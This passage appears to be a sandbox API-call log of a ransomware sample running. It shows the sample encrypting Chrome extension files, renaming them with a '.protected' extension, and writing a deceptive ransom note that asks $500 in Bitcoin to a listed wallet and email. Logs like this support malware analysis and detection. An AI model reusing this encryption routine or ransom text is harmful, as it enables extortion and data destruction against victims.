(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.696] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.696] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.696] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.696] CloseHandle (hObject=0x164) returned 1 [0078.696] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.696] lstrcmpiW (lpString1="fil", lpString2="Windows") returned -1 [0078.696] lstrcmpiW (lpString1="fil", lpString2="Program Files") returned -1 [0078.696] lstrcmpiW (lpString1="fil", lpString2="Program Files (x86)") returned -1 [0078.696] lstrcmpiW (lpString1="fil", lpString2="$Recycle.bin") returned 1 [0078.696] lstrcmpiW (lpString1="fil", lpString2="System Volume Information") returned -1 [0078.696] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil") returned 142 [0078.696] lstrcmpW (lpString1="fil", lpString2=".") returned 1 [0078.696] lstrcmpW (lpString1="fil", lpString2="..") returned 1 [0078.696] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\*") returned 144 [0078.697] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.698] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.698] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.698] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.698] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.698] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.698] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\.") returned 144 [0078.698] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.698] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.698] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.698] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.698] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.698] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.698] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.698] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\..") returned 145 [0078.698] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.698] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.698] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.698] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.698] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.698] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.698] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.698] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.698] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json") returned 156 [0078.698] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.698] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.698] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.698] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.698] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.699] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json") returned 156 [0078.699] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.699] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json") returned 156 [0078.699] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.699] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json") returned 156 [0078.699] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.699] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xe0, lpOverlapped=0x0) returned 1 [0078.700] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.700] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xe0, lpOverlapped=0x0) returned 1 [0078.700] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.700] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.700] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.700] CloseHandle (hObject=0x168) returned 1 [0078.701] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json.protected") returned 166 [0078.701] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json.protected")) returned 1 [0078.701] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.701] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.702] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\RESTORE_FILES.txt") returned 160 [0078.702] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.702] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.702] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.703] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.703] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.703] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.703] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.703] CloseHandle (hObject=0x164) returned 1 [0078.703] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.703] lstrcmpiW (lpString1="fr", lpString2="Windows") returned -1 [0078.703] lstrcmpiW (lpString1="fr", lpString2="Program Files") returned -1 [0078.703] lstrcmpiW (lpString1="fr", lpString2="Program Files (x86)") returned -1 [0078.703] lstrcmpiW (lpString1="fr", lpString2="$Recycle.bin") returned 1 [0078.703] lstrcmpiW (lpString1="fr", lpString2="System Volume Information") returned -1 [0078.703] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr") returned 141 [0078.704] lstrcmpW (lpString1="fr", lpString2=".") returned 1 [0078.704] lstrcmpW (lpString1="fr", lpString2="..") returned 1 [0078.704] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\*") returned 143 [0078.704] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.704] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.704] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.704] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.704] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.704] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.704] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\.") returned 143 [0078.704] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.704] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.704] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.704] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.704] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.704] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.704] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.704] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\..") returned 144 [0078.704] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.704] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.704] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.704] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.704] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.704] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.705] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.705] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.705] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json") returned 155 [0078.705] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.705] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.705] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.705] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.705] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.705] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json") returned 155 [0078.705] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.705] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json") returned 155 [0078.705] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.705] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json") returned 155 [0078.705] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.705] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xde, lpOverlapped=0x0) returned 1 [0078.706] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff22, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.706] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xde, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xde, lpOverlapped=0x0) returned 1 [0078.706] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.707] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.707] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.707] CloseHandle (hObject=0x168) returned 1 [0078.707] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json.protected") returned 165 [0078.707] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\messages.json.protected")) returned 1 [0078.707] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.708] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.708] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\RESTORE_FILES.txt") returned 159 [0078.708] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.708] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.708] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.709] lstrlenA 